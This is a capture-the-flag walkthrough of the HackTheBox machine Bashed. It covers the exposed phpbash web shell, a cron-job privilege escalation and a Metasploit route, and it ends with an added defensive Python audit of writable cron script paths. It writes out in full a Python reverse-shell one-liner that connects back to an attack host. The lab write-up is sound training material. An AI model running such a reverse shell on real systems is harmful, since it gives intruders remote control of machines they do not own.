HackTheBox Bashed

Bashed is a retired machine available on the HackTheBox platform, known for being easy to complete, which matches its official rating. The path begins with the discovery of a hidden web shell.

Let’s get started!🚀

Recon & Enumeration

Let’s use nmap to scan for open ports and services:

nmap scanning

Upon conducting a port scan, we observe that port 80 is open.

Check the target through a web browser

Bashed machine on port 80

Let us enumerate more using the tool dirsearch to scan for the directories we have on the web server.

Directory scanning using dirsearch

After going through the directories we got, we have /dev which seems to be interesting.

Directory /dev on bashed machine

Inside the directory /dev, we get the script phpbash.php which gives us access to a web shell.

Web shell on bashed

Exploitation W/O Metasploit

Let us move this shell to our attack box by setting up a listener there.

Netcat listener

On the target machine, send a reverse shell to the attack machine using the Python command below:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.8",4343));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we get a shell back on our attack box.

Getting a shell on bashed machine

Now we look for a way to escalate our privileges on the machine, starting with what we can run with sudo.

What sudo can be bypassed

We can run as the user scriptmanager, and with more enumeration, we find the below.

Listing machine’s files

We find that everything here is root owned except the directory /scripts which is owned by scriptmanager.

We change to scriptmanager as below.

scriptmanager user

As we can see below, we have full access rights to the /scripts directory.

scripts directory

We can see that we have a Python script owned by us. After listing all the files one more time, I saw that the last access time for the test.txt file had changed. After checking the Python script below, we can assume that there is a cron job running periodically.

test.py script

Let us delete the Python script file.

Deleting test.py

Then, create the Python script file as below to send a shell back to the attack box.

Creating a reverse shell script

Now we go back to our attack box and set up a listener on the same port we put in the shell.py above.

Netcat listener

After waiting for a while, we get a shell running as root.

Shell as a root
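From the defender's side, the root cause in this section is a periodic job running as root that executes a script from a directory owned by an unprivileged user (/scripts, owned by scriptmanager). The Python check below is an added example, not part of the original write-up: it walks a script path and its parent directories and reports anything a non-trusted account could modify or replace. The function names, parameters and the temporary directory layout are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

def audit_cron_target(path, trusted_uids=(0,), stop_at="/"):
    """Return (path, reason) findings for a privileged job's script and its parent dirs."""
    findings = []
    current = os.path.realpath(path)
    stop_at = os.path.realpath(stop_at)
    while True:
        st = os.stat(current)
        if st.st_uid not in trusted_uids:
            # The owner can rewrite a file, or delete and recreate entries in a directory.
            findings.append((current, "owned by uid %d" % st.st_uid))
        writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
        # In a sticky directory other users cannot delete or rename entries they do not own.
        if writable and not sticky_dir:
            findings.append((current, "group- or world-writable"))
        parent = os.path.dirname(current)
        if current == stop_at or parent == current:
            return findings
        current = parent

def demo():
    """Constructed layout mirroring the box: scripts/test.py run by a privileged job."""
    base = tempfile.mkdtemp()
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts)
    os.chmod(scripts, 0o755)
    script = os.path.join(scripts, "test.py")
    with open(script, "w") as fh:
        fh.write("print('job')\n")
    os.chmod(script, 0o644)
    me = os.getuid()
    # Current user stands in for the privileged account: nothing to report.
    hardened = audit_cron_target(script, trusted_uids=(me,), stop_at=base)
    # Another uid is the privileged account: the current user plays scriptmanager.
    exposed = audit_cron_target(script, trusted_uids=(me + 1,), stop_at=base)
    return hardened, exposed

if __name__ == "__main__":
    for path, reason in demo()[1]:
        print(path, reason)
```

On a real host, call `audit_cron_target` with the default arguments on each script path referenced by root's cron entries; a directory finding matters even when the script file itself is root-owned, because the directory owner can delete and recreate the file.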

Exploitation W/ Metasploit

We launch the Metasploit handler and set it to get the shell from the web shell we already have on the target.

MSF handler

We background the session and use a module to upgrade the shell to a Meterpreter one.

Searching for a shell to meterpreter module

We set its options and run.

Setting the options for the module

We check the sessions we have.

Sessions

We search for an exploit suggester module.

Exploit suggester

We set its options and run.

Setting the options for the suggester

We get the modules below, which show that the machine seems to be vulnerable to three of them.

Results of the suggester module

Use the first module, set its options, and run.

Options for priv esc module

And we get a root shell.

Root shell

Cheers.


Written by Abdullah Kareem

IT Specialist | Cyber Security Enthusiast | OSWP | eCPPT | CEH | CCNP Enterprise | CCNA | ITILv4